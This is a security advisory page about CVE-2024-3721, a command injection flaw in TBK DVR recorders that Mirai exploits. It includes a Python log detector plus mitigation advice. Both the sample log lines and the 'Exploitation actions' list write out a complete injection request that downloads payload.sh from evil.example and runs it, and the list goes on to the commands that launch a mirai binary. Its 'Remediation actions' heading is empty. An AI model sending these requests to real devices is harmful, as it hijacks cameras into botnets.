TBK DVR: Critical OS command injection in TBK DVR-4104 and DVR-4216 via /device.rsp?opt=sys&cmd parameter (CVE-2024-3721)
Summary
Welcome to today’s podcast. We’re diving into CVE-2024-3721, a critical OS command injection vulnerability in TBK DVR devices that has been actively exploited by a new wave of the Mirai botnet. Our experts will break down what’s at stake and how you can protect your network.
Product details
The affected products are the TBK DVR-4104 and DVR-4216 digital video recorders running firmware versions up to 20240412. These devices expose an HTTP endpoint at /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ for system operations.
Vulnerability type summary
CVE-2024-3721 is classified under CWE-78: OS Command Injection. A flaw in input handling allows an attacker to inject arbitrary shell commands into the DVR’s operating system, leading to full remote compromise.
Details of the vulnerability
The issue lies in how the DVR processes the mdb and mdc parameters of the sys command endpoint. By supplying crafted payloads, an attacker can break out of expected parameters and execute system commands. The vulnerability is remotely exploitable over the network, and proof-of-concept code has been publicly released under VDB-260573. Kaspersky’s GReAT team has observed a new Mirai variant leveraging this flaw to build IoT botnets that launch DDoS attacks and propagate further via brute-forcing credentials.
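One way to spot the request pattern described above in web or reverse-proxy access logs placed in front of the DVR. This is an added example, not code from the original page or from the vendor; the combined log format, the function name find_injection_attempts, and the rule that legitimate mdb/mdc values never contain shell metacharacters or whitespace are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request part of a combined-format access log line; the target may hold raw spaces.
REQUEST = re.compile(r'^(?P<src>\S+) [^"]*"[A-Z]+ (?P<target>.+?) HTTP/\d(?:\.\d)?"')
# Assumption: legitimate mdb/mdc values never contain these characters.
SHELL_META = re.compile(r"[;|&`$<>(){}\s]")
SYS_CMD = "___S_O_S_T_R_E_A_MAX___"  # cmd value given on the page


def find_injection_attempts(log_lines):
    """Return (source, parameter, decoded value) for each suspicious mdb/mdc value."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith("/device.rsp"):
            continue
        # Split on '&' only, so a ';' inside a value stays part of that value.
        pairs = [p.partition("=") for p in query.split("&")]
        decoded = [(k, unquote_plus(v)) for k, _, v in pairs]
        values = dict(decoded)
        if values.get("opt") != "sys" or values.get("cmd") != SYS_CMD:
            continue
        for key, value in decoded:
            if key in ("mdb", "mdc") and SHELL_META.search(value):
                hits.append((m.group("src"), key, value))
    return hits


# Constructed sample lines: documentation addresses, payload text taken from the page.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jun/2025:10:00:01 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget http://evil.example/payload.sh -O /tmp/payload.sh;sh /tmp/payload.sh HTTP/1.1" 200 0',
    '198.51.100.9 - - [09/Jun/2025:10:00:05 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1&mdc=1%3Bsh%20/tmp/payload.sh HTTP/1.1" 200 0',
    '192.0.2.10 - - [09/Jun/2025:10:01:00 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1&mdc=2 HTTP/1.1" 200 0',
    '192.0.2.10 - - [09/Jun/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for src, key, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{src} {key}={value!r}")
```

A payload that uses a raw `&` as its separator is split into extra query parameters before the check runs, so treat unexpected parameter names on this endpoint as a separate signal.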
Conclusion
To mitigate this threat, immediately update DVR firmware to a patched version from the vendor. Place IoT devices on a separate network segment, apply strict access controls, and monitor outbound traffic for unusual patterns. This incident underscores the importance of timely patching and robust network hygiene in defending against automated botnet campaigns.
Remediation and exploitation details
This chain involves the following actors
- Remote attacker: Scans for vulnerable devices and injects malicious commands
- Device administrator: Manages firmware and network access for TBK DVR devices
The following systems are involved
- TBK DVR-4104 (Digital video recorder for security camera streams): Target of operating system command injection
- TBK DVR-4216 (Digital video recorder for security camera streams): Target of operating system command injection
Attack entry point
- /device.rsp endpoint: Web management interface that processes opt=sys&cmd parameters
Remediation actions
Exploitation actions
Internet-wide port scan
- Use a scanning service to find devices responding on port 80 or 8080
Operating system command injection
- GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget http://evil.example/payload.sh -O /tmp/payload.sh;sh /tmp/payload.sh
Remote shell execution
- sh /tmp/payload.sh
- chmod +x /tmp/mirai
- ./tmp/mirai
Botnet registration and control channel setup
- Initiate contact to a command-and-control server over TCP
- Start denial-of-service modules on the device
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://vuldb.com/?id.260573
- https://vuldb.com/?ctiid.260573
- https://vuldb.com/?submit.314969
- https://github.com/netsecfish/tbk_dvr_command_injection
- [2025-06-09] A new variant of the Mirai botnet exploits CVE-2024-3721 to target TBK DVR systems.
- [2025-06-06] Analysis of the latest Mirai wave targeting TBK DVR devices with CVE-2024-3721 by Kaspersky GReAT experts.
- [2025-06-06] Analysis of the latest Mirai wave targeting TBK DVR devices with CVE-2024-3721.